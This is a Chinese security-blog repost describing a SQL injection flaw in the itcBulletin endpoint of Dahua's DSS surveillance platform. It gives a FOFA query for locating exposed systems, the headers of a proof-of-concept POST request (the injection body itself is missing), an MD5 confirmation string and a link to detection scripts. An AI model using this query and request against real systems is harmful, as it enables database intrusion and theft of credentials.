大华DSS itcBulletin SQL 注入漏洞
2023-12-26 09:9:49 Author: 网络安全透视镜(查看原文) 阅读量:58 收藏

大华 DSs 数字监控系统是大华开发的一款安防视频监控系统,拥有实时监视、云台操作、录像回放、报警处理、设备管理等功能。该平台存在SQL注入漏洞,攻击者可通过此漏洞获取数据库中的登录用户名密码等敏感数据。

fofa查询

app="dahua-DSS"

POC

POST /portal/services/itcBulletin?wsdl HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 352

返回数据包如下:

数据包中包含计算的md5值,c1f5f60a14b0bc9546b6f93d1ca5486 则漏洞存在

nuclei漏洞检测

pocsuite3漏洞检测

漏洞检测脚本已上传免费漏洞库

地址:

https://github.com/Vme18000yuan/FreePOC


文章来源: http://mp.weixin.qq.com/s?__biz=MzIxMTg1ODAwNw==&mid=2247498836&idx=2&sn=57b984204e94908d6fd35b03fbcdc99d&chksm=9636f6dc233fedc2f97a5f3f9a0b423494b0fab2aca942a81d090777f43aed71a75b86e79588&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh